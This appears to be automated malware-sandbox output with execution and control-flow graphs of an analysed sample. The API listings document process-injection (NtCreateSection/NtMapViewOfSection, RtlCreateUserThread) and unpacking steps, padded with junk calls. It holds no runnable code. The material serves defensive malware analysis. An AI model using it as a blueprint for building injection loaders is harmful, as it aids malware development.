                                                                                                                                                                • API String ID: 4159173863-0
                                                                                                                                                                • Opcode ID: 1a1355a4214cf67f46c550b7ed4b3c0a02d7eb781624a2e4aa6250646aa1c127
                                                                                                                                                                • Instruction ID: 756bc8bfdf9d8d10eb6f9b921beda427f38e019a2e514af8c0d7042b50038681
                                                                                                                                                                • Opcode Fuzzy Hash: 1a1355a4214cf67f46c550b7ed4b3c0a02d7eb781624a2e4aa6250646aa1c127
                                                                                                                                                                • Instruction Fuzzy Hash: E901D8B4A012049BCB20AF64ED45BDA3778EB18745F40407BFB05A7290DE345984CFAA

                                                                                                                                                                Execution Graph

                                                                                                                                                                Execution Coverage:7.1%
                                                                                                                                                                Dynamic/Decrypted Code Coverage:29.3%
                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                Total number of Nodes:164
                                                                                                                                                                Total number of Limit Nodes:7
                                                                                                                                                                execution_graph 4333 418e00 4336 4189c0 4333->4336 4335 418e05 4337 4189cd 4336->4337 4338 418ad0 7 API calls 4337->4338 4343 418c23 4337->4343 4340 418b55 7 API calls 4338->4340 4339 418c31 SetCommMask 4339->4343 4341 418c01 4340->4341 4342 418bf5 ObjectPrivilegeAuditAlarmA 4340->4342 4345 418c12 4341->4345 4346 418c0a WaitForSingleObject 4341->4346 4342->4341 4343->4339 4344 418c41 GetUserObjectInformationW 4343->4344 4347 418c62 4343->4347 4344->4343 4345->4343 4346->4345 4348 418c6b GetConsoleAliasesLengthA GetComputerNameW GetConsoleAliasExesLengthW GetBinaryType PurgeComm 4347->4348 4349 418cdd 4347->4349 4356 418cbb 4348->4356 4362 418650 LocalAlloc 4349->4362 4353 418d2d 4364 418920 4353->4364 4354 418ce2 LoadLibraryA 4363 418680 GetModuleHandleW GetProcAddress VirtualProtect 4354->4363 4356->4349 4357 418d49 MoveFileW 4358 418d32 4357->4358 4358->4357 4359 418d73 InterlockedCompareExchange 4358->4359 4361 418d8d 4358->4361 4359->4358 4361->4335 4362->4354 4363->4353 4365 418949 QueryDosDeviceA 4364->4365 4366 41895d 4364->4366 4365->4366 4375 418820 4366->4375 4369 418970 FreeEnvironmentStringsA 4370 418978 4369->4370 4378 418860 4370->4378 4373 41898f HeapDestroy GetNumaProcessorNode 4374 4189a6 4373->4374 4374->4358 4376 418831 FatalAppExitA GetModuleHandleW 4375->4376 4377 418843 4375->4377 4376->4377 4377->4369 4377->4370 4379 41887c 4378->4379 4380 41886e BuildCommDCBA 4378->4380 4381 418884 FreeEnvironmentStringsA 4379->4381 4384 41888c 4379->4384 4380->4384 4381->4384 4382 4188fb 4382->4373 4382->4374 4384->4382 4385 4188bd GetNumaAvailableMemoryNode SetCalendarInfoW OpenJobObjectA BackupSeek 4384->4385 4386 418850 4384->4386 4385->4384 4389 4187d0 4386->4389 4390 4187fb 4389->4390 4391 4187ec SetPriorityClass 4389->4391 4390->4384 4391->4390 4392 6cfdae 4393 6cfdbd 4392->4393 4396 6d054e 4393->4396 4399 6d0569 4396->4399 4397 6d0572 CreateToolhelp32Snapshot 4398 6d058e Module32First 4397->4398 4397->4399 4400 6d059d 4398->4400 4401 6cfdc6 4398->4401 4399->4397 4399->4398 4403 6d020d 4400->4403 4404 6d0238 4403->4404 4405 6d0249 VirtualAlloc 4404->4405 4406 6d0281 4404->4406 4405->4406 4406->4406 4407 403043 4408 40319a 4407->4408 4409 40306d 4407->4409 4409->4408 4410 403128 RtlCreateUserThread NtTerminateProcess 4409->4410 4410->4408 4477 4014cf 4478 4014d3 4477->4478 4479 401660 NtDuplicateObject 4478->4479 4485 401571 4478->4485 4480 40167d NtCreateSection 4479->4480 4479->4485 4481 4016a3 NtMapViewOfSection 4480->4481 4482 4016fd NtCreateSection 4480->4482 4481->4482 4483 4016c6 NtMapViewOfSection 4481->4483 4484 401729 4482->4484 4482->4485 4483->4482 4486 4016e4 4483->4486 4484->4485 4487 401733 NtMapViewOfSection 4484->4487 4486->4482 4487->4485 4488 40175a NtMapViewOfSection 4487->4488 4488->4485 4451 2160005 4456 216092b GetPEB 4451->4456 4453 2160030 4458 216003c 4453->4458 4457 2160972 4456->4457 4457->4453 4459 2160049 4458->4459 4460 2160e0f 2 API calls 4459->4460 4461 2160223 4460->4461 4462 2160d90 GetPEB 4461->4462 4463 2160238 VirtualAlloc 4462->4463 4464 2160265 4463->4464 4465 21602ce VirtualProtect 4464->4465 4467 216030b 4465->4467 4466 2160439 VirtualFree 4470 21604be LoadLibraryA 4466->4470 4467->4466 4469 21608c7 4470->4469 4583 4015d5 4584 4015e4 4583->4584 4585 401660 NtDuplicateObject 4584->4585 4591 40177c 4584->4591 4586 40167d NtCreateSection 4585->4586 4585->4591 4587 4016a3 NtMapViewOfSection 4586->4587 4588 4016fd NtCreateSection 4586->4588 4587->4588 4589 4016c6 NtMapViewOfSection 4587->4589 4590 401729 4588->4590 4588->4591 4589->4588 4592 4016e4 4589->4592 4590->4591 4593 401733 NtMapViewOfSection 4590->4593 4592->4588 4593->4591 4594 40175a NtMapViewOfSection 4593->4594 4594->4591 4411 402f16 4413 402f1a 4411->4413 4412 402fa2 4413->4412 4415 401991 4413->4415 4416 4019a0 4415->4416 4417 4019d8 Sleep 4416->4417 4419 4019f3 4417->4419 4420 4014c4 4417->4420 4419->4412 4421 4014d3 4420->4421 4422 401660 NtDuplicateObject 4421->4422 4428 401571 4421->4428 4423 40167d NtCreateSection 4422->4423 4422->4428 4424 4016a3 NtMapViewOfSection 4423->4424 4425 4016fd NtCreateSection 4423->4425 4424->4425 4426 4016c6 NtMapViewOfSection 4424->4426 4427 401729 4425->4427 4425->4428 4426->4425 4429 4016e4 4426->4429 4427->4428 4430 401733 NtMapViewOfSection 4427->4430 4428->4419 4429->4425 4430->4428 4431 40175a NtMapViewOfSection 4430->4431 4431->4428 4471 2160001 4472 2160005 4471->4472 4473 216092b GetPEB 4472->4473 4474 2160030 4473->4474 4475 216003c 7 API calls 4474->4475 4476 2160038 4475->4476 4549 418896 4550 4188a0 4549->4550 4551 418850 SetPriorityClass 4550->4551 4552 4188bd GetNumaAvailableMemoryNode SetCalendarInfoW OpenJobObjectA BackupSeek 4550->4552 4553 4188fb 4550->4553 4551->4550 4552->4550 4554 402e9a 4555 402e5f 4554->4555 4557 402eaf 4554->4557 4556 401991 8 API calls 4558 402fa2 4556->4558 4557->4556 4557->4558 4501 402ee7 4502 402ef9 4501->4502 4503 401991 8 API calls 4502->4503 4504 402fa2 4502->4504 4503->4504 4631 4019a9 4632 4019a0 4631->4632 4633 4019d8 Sleep 4632->4633 4634 4014c4 7 API calls 4633->4634 4635 4019f3 4633->4635 4634->4635 4432 216003c 4433 2160049 4432->4433 4445 2160e0f SetErrorMode SetErrorMode 4433->4445 4438 2160265 4439 21602ce VirtualProtect 4438->4439 4441 216030b 4439->4441 4440 2160439 VirtualFree 4444 21604be LoadLibraryA 4440->4444 4441->4440 4443 21608c7 4444->4443 4446 2160223 4445->4446 4447 2160d90 4446->4447 4448 2160dad 4447->4448 4449 2160dbb GetPEB 4448->4449 4450 2160238 VirtualAlloc 4448->4450 4449->4450 4450->4438 4559 401975 4560 401979 4559->4560 4561 4014c4 7 API calls 4560->4561 4562 4019f3 4561->4562

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 0 4189c0-4189e8 2 4189f0-4189f7 0->2 3 418a24-418a2a 2->3 4 4189f9-418a20 2->4 5 418a2c-418a38 3->5 6 418a3e-418a48 3->6 4->3 5->6 7 418a83-418a8a 6->7 8 418a4a-418a79 6->8 7->2 9 418a90-418a96 7->9 8->7 10 418a98-418a9e 9->10 12 418aa0-418aa6 10->12 13 418aac-418ab6 10->13 12->13 14 418ab8 13->14 15 418aba-418ac1 13->15 14->15 15->10 16 418ac3-418aca 15->16 17 418ad0-418bf3 InterlockedCompareExchange SetFocus ReadConsoleA FindAtomW SearchPathA GetConsoleMode SearchPathW GetDefaultCommConfigA CopyFileExA CreatePipe GetEnvironmentStringsW WriteConsoleOutputA GetModuleFileNameW GetSystemTimeAdjustment 16->17 18 418c23-418c2f 16->18 22 418c01-418c08 17->22 23 418bf5-418bfb ObjectPrivilegeAuditAlarmA 17->23 19 418c31-418c3f SetCommMask 18->19 24 418c51-418c57 19->24 25 418c41-418c4b GetUserObjectInformationW 19->25 26 418c12-418c20 22->26 27 418c0a-418c0c WaitForSingleObject 22->27 23->22 28 418c62-418c69 24->28 29 418c59-418c60 24->29 25->24 26->18 27->26 31 418c6b-418cda GetConsoleAliasesLengthA GetComputerNameW GetConsoleAliasExesLengthW GetBinaryType PurgeComm 28->31 32 418cdd-418cec call 418650 28->32 29->19 29->28 31->32 37 418d1d-418d28 LoadLibraryA call 418680 32->37 38 418cee-418cff 32->38 42 418d2d-418d3e call 418920 37->42 41 418d00-418d10 38->41 43 418d12 41->43 44 418d18-418d1b 41->44 49 418d40-418d47 42->49 43->44 44->37 44->41 50 418d49-418d57 MoveFileW 49->50 51 418d5d-418d63 49->51 50->51 53 418d65 call 418670 51->53 54 418d6a-418d71 51->54 53->54 57 418d73-418d7e InterlockedCompareExchange 54->57 58 418d84-418d8b 54->58 57->58 58->49 59 418d8d-418d9d 58->59 61 418da0-418db0 59->61 63 418db2 61->63 64 418db9-418dbc 61->64 63->64 64->61 65 418dbe-418dc9 64->65 66 418dd0-418dd5 65->66 67 418dd7-418ddd 66->67 68 418ddf-418de5 66->68 67->68 69 418de7-418df4 67->69 68->66 68->69
                                                                                                                                                                APIs
                                                                                                                                                                • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00418ADB
                                                                                                                                                                • SetFocus.USER32(00000000), ref: 00418AE4
                                                                                                                                                                • ReadConsoleA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00418AEF
                                                                                                                                                                • FindAtomW.KERNEL32(00000000), ref: 00418AF6
                                                                                                                                                                • SearchPathA.KERNEL32(0041A3E4,0041A3CC,0041A3B8,00000000,?,?), ref: 00418B1A
                                                                                                                                                                • GetConsoleMode.KERNEL32(00000000,00000000), ref: 00418B22
                                                                                                                                                                • SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00418B3A
                                                                                                                                                                • GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00418B61
                                                                                                                                                                • CopyFileExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418B6D
                                                                                                                                                                • CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 00418B83
                                                                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 00418B89
                                                                                                                                                                • WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 00418BCE
                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 00418BDD
                                                                                                                                                                • GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 00418BE6
                                                                                                                                                                • ObjectPrivilegeAuditAlarmA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418BFB
                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00418C0C
                                                                                                                                                                • SetCommMask.KERNELBASE(00000000,00000000), ref: 00418C35
                                                                                                                                                                • GetUserObjectInformationW.USER32(00000000,00000000,00000000,00000000,00000000), ref: 00418C4B
                                                                                                                                                                • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00418C7A
                                                                                                                                                                • GetComputerNameW.KERNEL32(?,?), ref: 00418C8E
                                                                                                                                                                • GetConsoleAliasExesLengthW.KERNEL32 ref: 00418C94
                                                                                                                                                                • GetBinaryType.KERNEL32(0041A3F0,?), ref: 00418CA6
                                                                                                                                                                • PurgeComm.KERNEL32(00000000,00000000), ref: 00418CAE
                                                                                                                                                                • LoadLibraryA.KERNELBASE(0041A410), ref: 00418D22
                                                                                                                                                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00418D57
                                                                                                                                                                • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00418D7E
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2067190050.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_7_2_40b000_4470.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Console$CommFileObject$CompareExchangeInterlockedLengthNamePathSearch$AdjustmentAlarmAliasAliasesAtomAuditBinaryComputerConfigCopyCreateDefaultEnvironmentExesFindFocusInformationLibraryLoadMaskModeModuleMoveOutputPipePrivilegePurgeReadSingleStringsSystemTimeTypeUserWaitWrite
                                                                                                                                                                • String ID: k`$}$
                                                                                                                                                                • API String ID: 87775671-956986773
                                                                                                                                                                • Opcode ID: 48971c36b23ff85eb0f2744f6ec5e1cb4899774be3d2319cfe000faf9f975359
                                                                                                                                                                • Instruction ID: 14be8ff56781b1d00f5d5c610e1110d06a152b2d889af403ee48b93a4b1bf100
                                                                                                                                                                • Opcode Fuzzy Hash: 48971c36b23ff85eb0f2744f6ec5e1cb4899774be3d2319cfe000faf9f975359
                                                                                                                                                                • Instruction Fuzzy Hash: EDB1C671901224ABCB209B65EC54BDF7B79EF59310F00806EF609A31A1DB385E84CFAD

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 156 4014c4-4014f6 162 4014f9-40150d call 401240 156->162 167 401512-401513 162->167 168 401544-401545 167->168 169 401515-401528 167->169 171 401547 168->171 172 4015bd-4015d4 168->172 169->162 170 40152a-401535 169->170 170->167 173 401537-401543 170->173 174 401596-4015a6 171->174 175 401549-40154b 171->175 173->168 177 4015a8 174->177 175->177 178 40154d-40156d 175->178 180 4015e7-40160a call 401240 178->180 181 40156f 178->181 190 40160c 180->190 191 40160f-401614 180->191 185 401571 181->185 186 4015e2-4015e3 181->186 186->180 190->191 193 40161a-40162b 191->193 194 40193e-401946 191->194 198 401631-40165a 193->198 199 40193c 193->199 194->191 197 40194b-40198e call 401240 194->197 198->199 207 401660-401677 NtDuplicateObject 198->207 199->197 207->199 209 40167d-4016a1 NtCreateSection 207->209 211 4016a3-4016c4 NtMapViewOfSection 209->211 212 4016fd-401723 NtCreateSection 209->212 211->212 214 4016c6-4016e2 NtMapViewOfSection 211->214 212->199 215 401729-40172d 212->215 214->212 217 4016e4-4016fa 214->217 215->199 218 401733-401754 NtMapViewOfSection 215->218 217->212 218->199 220 40175a-401776 NtMapViewOfSection 218->220 220->199 223 40177c 220->223 223->199 224 40177c call 401781 223->224 224->199
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2067159235.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_4470.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 2c516529a2ac13b86f5a9833a34ba141477503330a6309f7cab00fb21d89e914
                                                                                                                                                                • Instruction ID: a2440897234d9063cbd2a71cb92c382042c3cd10596cdc4f18a7c269882a1901
                                                                                                                                                                • Opcode Fuzzy Hash: 2c516529a2ac13b86f5a9833a34ba141477503330a6309f7cab00fb21d89e914
                                                                                                                                                                • Instruction Fuzzy Hash: 0981D5B4504244FBDB208F95CC49FEB7BB8EF81740F20416BF902BA1E5D6749902DB66

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 225 4015d5-4015e4 227 4015f4 225->227 228 4015eb-4015f0 225->228 227->228 229 4015f7-40160a call 401240 227->229 228->229 232 40160c 229->232 233 40160f-401614 229->233 232->233 235 40161a-40162b 233->235 236 40193e-401946 233->236 240 401631-40165a 235->240 241 40193c 235->241 236->233 239 40194b-40198e call 401240 236->239 240->241 249 401660-401677 NtDuplicateObject 240->249 241->239 249->241 251 40167d-4016a1 NtCreateSection 249->251 253 4016a3-4016c4 NtMapViewOfSection 251->253 254 4016fd-401723 NtCreateSection 251->254 253->254 256 4016c6-4016e2 NtMapViewOfSection 253->256 254->241 257 401729-40172d 254->257 256->254 259 4016e4-4016fa 256->259 257->241 260 401733-401754 NtMapViewOfSection 257->260 259->254 260->241 262 40175a-401776 NtMapViewOfSection 260->262 262->241 265 40177c 262->265 265->241 266 40177c call 401781 265->266 266->241
                                                                                                                                                                APIs
                                                                                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000), ref: 0040169C
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                                                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2067159235.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_4470.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1546783058-0
                                                                                                                                                                • Opcode ID: 7ee060c25f7402fbb52614a213f4e0533528eb01ea0636b15e5313f781570415
                                                                                                                                                                • Instruction ID: 5b275a0397ac31cab10c66c3112b8ecfdbc4447489e22d1c2cba3eb21d005058
                                                                                                                                                                • Opcode Fuzzy Hash: 7ee060c25f7402fbb52614a213f4e0533528eb01ea0636b15e5313f781570415
                                                                                                                                                                • Instruction Fuzzy Hash: 8251F9B5900245BBEB208F91CC48FEF7BB8EF85710F10416AFA11BA2A5D7759941CB64

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 267 4015df-4015e4 269 4015f4 267->269 270 4015eb-4015f0 267->270 269->270 271 4015f7-40160a call 401240 269->271 270->271 274 40160c 271->274 275 40160f-401614 271->275 274->275 277 40161a-40162b 275->277 278 40193e-401946 275->278 282 401631-40165a 277->282 283 40193c 277->283 278->275 281 40194b-40198e call 401240 278->281 282->283 291 401660-401677 NtDuplicateObject 282->291 283->281 291->283 293 40167d-4016a1 NtCreateSection 291->293 295 4016a3-4016c4 NtMapViewOfSection 293->295 296 4016fd-401723 NtCreateSection 293->296 295->296 298 4016c6-4016e2 NtMapViewOfSection 295->298 296->283 299 401729-40172d 296->299 298->296 301 4016e4-4016fa 298->301 299->283 302 401733-401754 NtMapViewOfSection 299->302 301->296 302->283 304 40175a-401776 NtMapViewOfSection 302->304 304->283 307 40177c 304->307 307->283 308 40177c call 401781 307->308 308->283
                                                                                                                                                                APIs
                                                                                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000), ref: 0040169C
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                                                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2067159235.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_4470.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1546783058-0
                                                                                                                                                                • Opcode ID: ece60b1a1f6b7668ef9dd9651a4bb7dd92a40417c9a174c89548745d0f41eda4
                                                                                                                                                                • Instruction ID: aa7ad941c6157971e71dc2736092b98b642c15495c2c07021be349f0f8194e9f
                                                                                                                                                                • Opcode Fuzzy Hash: ece60b1a1f6b7668ef9dd9651a4bb7dd92a40417c9a174c89548745d0f41eda4
                                                                                                                                                                • Instruction Fuzzy Hash: 4D51FAB5900249BBEB208F91CC48FEF7BB8EF85710F10015AFA11BA2A5D7749945CB64

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 309 4015f2-4015f4 311 4015f7-40160a call 401240 309->311 312 4015eb-4015f0 309->312 315 40160c 311->315 316 40160f-401614 311->316 312->311 315->316 318 40161a-40162b 316->318 319 40193e-401946 316->319 323 401631-40165a 318->323 324 40193c 318->324 319->316 322 40194b-40198e call 401240 319->322 323->324 332 401660-401677 NtDuplicateObject 323->332 324->322 332->324 334 40167d-4016a1 NtCreateSection 332->334 336 4016a3-4016c4 NtMapViewOfSection 334->336 337 4016fd-401723 NtCreateSection 334->337 336->337 339 4016c6-4016e2 NtMapViewOfSection 336->339 337->324 340 401729-40172d 337->340 339->337 342 4016e4-4016fa 339->342 340->324 343 401733-401754 NtMapViewOfSection 340->343 342->337 343->324 345 40175a-401776 NtMapViewOfSection 343->345 345->324 348 40177c 345->348 348->324 349 40177c call 401781 348->349 349->324
                                                                                                                                                                APIs
                                                                                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000), ref: 0040169C
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                                                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2067159235.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_4470.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1546783058-0
                                                                                                                                                                • Opcode ID: 5004b19ac8624500f5096878767cb1f7e044049cfcd571ee7eaf3f6ae6e17c7c
                                                                                                                                                                • Instruction ID: 51677960ee3875d5e78d4b2c0b9a124aae989836c1cf5ff6a0c78d9f2f0b6c9a
                                                                                                                                                                • Opcode Fuzzy Hash: 5004b19ac8624500f5096878767cb1f7e044049cfcd571ee7eaf3f6ae6e17c7c
                                                                                                                                                                • Instruction Fuzzy Hash: 8E51FAB5900249BBEB208F91CC48FAFBBB8EF85710F10415AF911BA2A5D7759941CB64

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 350 4015e6-40160a call 401240 355 40160c 350->355 356 40160f-401614 350->356 355->356 358 40161a-40162b 356->358 359 40193e-401946 356->359 363 401631-40165a 358->363 364 40193c 358->364 359->356 362 40194b-40198e call 401240 359->362 363->364 372 401660-401677 NtDuplicateObject 363->372 364->362 372->364 374 40167d-4016a1 NtCreateSection 372->374 376 4016a3-4016c4 NtMapViewOfSection 374->376 377 4016fd-401723 NtCreateSection 374->377 376->377 379 4016c6-4016e2 NtMapViewOfSection 376->379 377->364 380 401729-40172d 377->380 379->377 382 4016e4-4016fa 379->382 380->364 383 401733-401754 NtMapViewOfSection 380->383 382->377 383->364 385 40175a-401776 NtMapViewOfSection 383->385 385->364 388 40177c 385->388 388->364 389 40177c call 401781 388->389 389->364
                                                                                                                                                                APIs
                                                                                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000), ref: 0040169C
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                                                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2067159235.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_4470.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1546783058-0
                                                                                                                                                                • Opcode ID: f3e491e8a03b641489fc3b5b9cce92a4ae92d047acba71485eea125912a2ab07
                                                                                                                                                                • Instruction ID: 771dbcf6e2504e630b0d67c3c545d31db11f89db77175d6a648901ef483dfe93
                                                                                                                                                                • Opcode Fuzzy Hash: f3e491e8a03b641489fc3b5b9cce92a4ae92d047acba71485eea125912a2ab07
                                                                                                                                                                • Instruction Fuzzy Hash: 5451F9B5900249BFEB208F91CC48FEFBBB8EF85B10F100159F911BA2A5D7709945CB64

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 391 403043-403067 392 40319a-40319f 391->392 393 40306d-403085 391->393 393->392 394 40308b-40309c 393->394 395 40309e-4030a7 394->395 396 4030ac-4030ba 395->396 396->396 397 4030bc-4030c3 396->397 398 4030e5-4030ec 397->398 399 4030c5-4030e4 397->399 400 40310e-403111 398->400 401 4030ee-40310d 398->401 399->398 402 403113-403116 400->402 403 40311a 400->403 401->400 402->403 404 403118 402->404 403->395 405 40311c-403121 403->405 404->405 405->392 406 403123-403126 405->406 406->392 407 403128-403197 RtlCreateUserThread NtTerminateProcess 406->407 407->392
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2067159235.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_4470.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateProcessTerminateThreadUser
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1921587553-0
                                                                                                                                                                • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                                                                                                • Instruction ID: 174b4c01c38e91558bfb09f2734ea8af57ab2b253068959c7a4b5a028629c542
                                                                                                                                                                • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                                                                                                • Instruction Fuzzy Hash: 2D415A31218E084FD768EF5CA84976277D5FB98311F6A43BAE809D7385EA34DC1183C9

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
